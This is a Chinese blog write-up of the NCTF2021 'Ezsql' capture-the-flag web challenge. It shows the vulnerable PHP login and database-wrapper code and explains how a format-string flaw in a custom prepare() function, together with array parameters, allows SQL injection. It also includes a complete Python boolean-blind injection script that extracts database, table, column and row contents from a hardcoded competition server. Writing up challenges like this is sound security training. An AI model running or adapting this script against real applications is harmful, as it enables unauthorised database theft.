NCTF2021 Ezsql

最新推荐文章于 2023-11-09 10:37:14 发布
最新推荐文章于 2023-11-09 10:37:14 发布
阅读量389 收藏
点赞数
分类专栏: CTF WEB 文章标签: python web 安全 sql 布尔盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45619909/article/details/121661719
版权

PHP注入 数据库盲注 格式化字符串 布尔盲注 SQL安全
关键词由CSDN通过智能技术生成
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
WEB
5 篇文章 0 订阅
订阅专栏

好兄弟👦发来的题目,👴当时没做出来,幸好环境还在

这道题测试一遍后,没什么收获,马后炮先扫描网站目录

发现源码,共有三个文件:config.phpDB.phplogin.php

代码审计

config是连接数据库的文件,没啥用,login是登录页面,DB是处理文件,这两个需要着重看一下,文件先挂在下面

login.php
<?php
include_once('config.php');
?>
<!DOCTYPE html>
<html>
    <head>
        <title>There is no absolutely safe system</title>
    </head>
    <body>
<?php
if (isset($_POST['password'])){
    $query = db::prepare("SELECT * FROM `users` where password=md5(%s)", $_POST['password']);

    if (isset($_POST['name'])){
        $query = db::prepare($query . " and name=%s", $_POST['name']);
    }
    else{
        $query = $query . " and name='benjaminEngel'";
    }
    $query = $query . " limit 1";

    $result = db::commit($query);

    if ($result->num_rows > 0){
        die('NCTF{ez');
    }
    else{
        die('Wrong name or password.');
    }
}
else{?>
        <form action="login.php" method="post">
            <input name="name" id="name" placeholder="benjaminEngel" value=bejaminEngel disabled>
            <input type="password" name="password" id="password" placeholder="Enter password">
            <button type="submit">Submit</button>
        </form>
<?php 
}
?>
    </body>
</html>

先看login.php,传入password后,放进prepare方法里,看单词应该是个处理方法,然后判断是否传入name,若有就再次放进prepare处理,若无就将name设置为‘benjaminEngel’(前端单词却是bejaminEngel)。随后,把语句设置为查询一条数据,放进commit方法里。如果查询到了数据就输出一段flag,否则输出错误报告

DB.php
<?php

class DB{
    private static $db = null;

    public function __construct($db_host, $db_user, $db_pass, $db_database){
        static::$db = new mysqli($db_host, $db_user, $db_pass, $db_database);
    }


    static public function buildMySQL($db_host, $db_user, $db_pass, $db_database)
    {
        return new DB($db_host, $db_user, $db_pass, $db_database);
    }

    public static function getInstance(){
        return static::$db;
    }

    public static function connect_error(){
        return static::$db->connect_errno;
    }

    public static function prepare($query, $args){
        if (is_null($query)){
            return;
        }
        if (strpos($query, '%') === false){
            die('%s not included in query!');
            return;
        }

        // get args
        $args = func_get_args();
        array_shift( $args );

        $args_is_array = false;
        if (is_array($args[0]) && count($args) == 1 ) {
            $args = $args[0];
            $args_is_array = true;
        }

        $count_format = substr_count($query, '%s');

        if($count_format !== count($args)){
            die('Wrong number of arguments!');
            return;
        }
        // escape
        foreach ($args as &$value){
            $value = static::$db->real_escape_string($value);
        }

        // prepare
        $query = str_replace("%s", "'%s'", $query);
        $query = vsprintf($query, $args);
        return $query;

    }
    public static function commit($query){
        $res = static::$db->query($query);
        if($res !== false){ 
                return $res;
            }
            else{
                die('Error in query.');
        }
    }
}
?>

DB这里是最核心的部分,根据login文件可知,prepare和commit是核心的方法,向prepare传入两个参数,根据login.php可知,一个是sql语句一个是参数。若语句为空就直接返回,若语句里没有%,就输出报错然后返回。将此方法的参数放到一个数组里,将此参数数组第一个元素删除,将args_is_array设置为false(这个没啥用,没找到用到此布尔变量的地方),若参数数组含有一个元素且此元素为数组,那么将此元素赋给参数数组。计算sql语句中%s的个数,跟参数数组中的元素个数不同则报错并返回。将参数进行转义。将%s替换为'%s',将参数值放入sql语句中。commit方法,先进行查询,然后查询结果不为false就返回res,否则就是输出报错。

分析

这里想闭合符号进行测试,尝试很多都不行,传入引号也会被转义

倘若不传入name,语句拼接了name并且限制一条数据,这个时候就只能从password入手,但password会被加上单引号,想闭合也会被转义,所以我们必须传入name,后续操作也要在name中进行。可在name中操作,就算没有转义,你闭合了符号,由于前面限制了password=md5(%s),你也查不到任何东西。这里卡住了,最终思路是,改闭合password那里。这就很妙了,我们将password里传入格式化字符串%s(%需要编码),这样的话,传入的name值就作为password里的字符串,在password那里闭合小括号,后面注释就可以了。但是格式化字符和参数个数不一致会报错。所以这里想到name传入数组,传入两个name用于平衡格式化字符串,后面那个name值随便是啥,反正都被注释了。(源码自己运行测试,加几个print语句,看语句如何构造的,用于理解这题很有帮助)

所以传入一句进行测试:password=%25s&name[0]=) union select 1,2,3#&name[1]=随便

由于没有其他回显,查询不到会报错,所以直接布尔盲注,采用二分法

脚本

import binascii
import time

import requests

url = "http://129.211.173.64:3080/login.php"

Success_message = "NCTF"
payload = ""
data = {
    "password": "%s",
    "name[0]": payload,
    "name[1]": "随便"
}


def database_name():
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            data["name[0]"] = ") or ascii(substr(database(),%d,1))>%d#" % (i, mid)

            time.sleep(0.1)
            res = requests.post(url=url, data=data)
            if Success_message not in res.text:
                end = mid
            else:
                begin = mid + 1
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name


def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            data[
                "name[0]"] = ") or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d#" % (
                j, mid)

            time.sleep(0.1)
            res = requests.post(url=url, data=data)
            if Success_message not in res.text:
                end = mid
            else:
                begin = mid + 1
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            data[
                "name[0]"] = ') or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=%s),%d,1))>%d#' % (
                ("0x" + binascii.b2a_hex(tab_name.encode()).decode()), j, mid)

            time.sleep(0.1)
            res = requests.post(url=url, data=data)
            if Success_message not in res.text:
                end = mid
            else:
                begin = mid + 1
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    dt = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            data["name[0]"] = ") or ascii(substr((select(group_concat(`%s`))from `%s`),%d,1))>%d#" % (
            col_name, tab_name, i, mid)

            time.sleep(0.1)
            res = requests.post(url=url, data=data)
            if Success_message not in res.text:
                end = mid
            else:
                begin = mid + 1
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        dt += chr(mid)
        print(("%s表的%s字段数据: " + dt) % (tab_name, col_name))


if __name__ == '__main__':
    database_name()
    table_name()

脚本改个url直接运行,由于有转义函数的存在,所以部分paylaod里的等于表名不能用引号包裹,改成十六进制字符串就好。group_concat或者from表名时,用反引号包裹绕过。

Tajang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
NCTF-Writeup
Yukikaze_cxy
05-30 1694
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
[NCTF2019]Sore
2er0!=O的博客
08-01 886
[NCTF2019]Sore 附件: ciphertext.txt: nsfAIHFrMuLynuCApeEstxJOzniQuyBVfAChDEznppfAiEIDcyNFBsCjsLvGlDtqztuaHvHbCmuyGNsIMhGlDtbotCoDzDjhyBzHGfHGfoHsuhlssIMvwlixBHHGfDRjoCKrapNIwqNyuxIBACQhtMwCmMCfEBpsrzEuiLGBoMipTkxrznoHfAkqwzvxuzCzDbLyApCGvjpqxkuwpgsLrqsVfCRw
[青少年CTF]ezsql
明裕学长的博客
03-16 331
猜测出密码后登录得到flag。
青少年ctf 2个SQL ctf平台
weixin_69830800的博客
06-08 381
虽然修改的是admin'#的密码,但是由于存在sql注入,导致最后实际被修改的是admin的密码。于是去注册一个账号,不过结合题目所说2个sql,所以我们在注册的时候账号名注册为。我们这题目的思路是,先观察,发现 有个注册,修改完成后,我们去登录admin。密码就是123456(修改后的)登录admin后flag就出来了。于是乎统统改为123456。注册完成后登录这个账号。
WebSQL注入例题wp
uuzeray的博客
11-09 473
明天c语言月测了,再写博客就只能裸考了罢(悲)
qsnctf queen wp
arcuied
11-23 509
qsnctf queen wp
第十届南京邮电大学网络攻防大赛(NCTF 2021)writeup
热门推荐
渗透测试研究中心
12-22 1万+
WebX1cT34m_API_SystemAuthor:wh1sper题目描述:在API安全的新时代,安全圈迎来风云变幻。掀起巨浪的你?只手遮天的你?选择保护还是放弃你的曾经的伙伴?target:http://129.211.173.64:58082/附件链接:https://wwn.lanzoui.com/iUoDwwyfdxchint1:the hidden API to bypass 4...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
NCTF 2019 Re Writeup(四题)
siphre
11-25 934
reverse 一、DEBUG ELF动态调试,flag长度24字节,用户输入的字符串跟经过处理后的字符串s做校验。因为变量s是经过处理的,得在cmp dl,al下断看eax寄存器的值,可以看到最终比较的时候s的值。 手抄s的值出来,再python翻译成字符串即可。 flag=[0x4E,0x43,0x54,0x46,0x7b,0x6a,0x75,0x73,0x74,0x5f,0x6...
南京邮电大学2021年CTF
戴夫特
03-15 1008
web登入页面1 <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); mysql_select_db(SAE_MYSQL_DB); $user = trim($_POST[user]); $pass = md5(trim($_POST[pass])); $sql
NCTF2021——wp
m0_46296905的博客
11-30 824
文章目录一、REHello せかいShadowbringer鲨鲨的秘密二、MISC做题做累了来玩玩游戏吧Hex酱的秘密花园Hello File Format 一、RE Hello せかい ida反编译,flag明文给出 Shadowbringer 那两个函数是2次base64变异码表的编码,函数反过来换两次码表解码一下就得到flag。 鲨鲨的秘密 SEH里面有反调试(直接nop),还有初始化表需要用到的key(dword_404E58) for循环里面边smc边执行,直接动调分析逻辑 最后写exp如
NSSCTF 刷题记录
红叶的博客
03-07 1118
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
青少年CTF_WEB
cfy2401926342的博客
01-17 491
青少年CTF_WEB
qsnctf CheckMe08 wp
arcuied
11-10 374
qsnctf CheckMe08 wp
NSSCTF ez_unserialize
m0_49257076的博客
11-02 1122
打开题目是胡桃摇的表情包(手动滑稽????),下面是“题目在哪” 这边是上手直接使用蚁剑扫描得到的robots.txt文件,然后打开之后有cl45s.php文件,访问之后可以看到题目的源码 观察源码就知道是一个简单的unserialize,手写一下(菜狗枯了) <?php class wllm{ public $admin; public $passwd; public function __construct(){ $this->admin ...
记xctf_web Web_php_unserialize,关于php反序列化的思考
fly夏天的博客
12-13 1643
先来看题目,题目说是php_unserialize可见是php序列化的题目。 打开网页时一段源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } functi...
解决ezSQL编码问题
weixin_33847182的博客
10-12 95
为什么80%的码农都做不了架构师?>>> ...
CTF php反序列化总结
m0_53567065的博客
11-17 4644
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tajang

感谢投喂

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值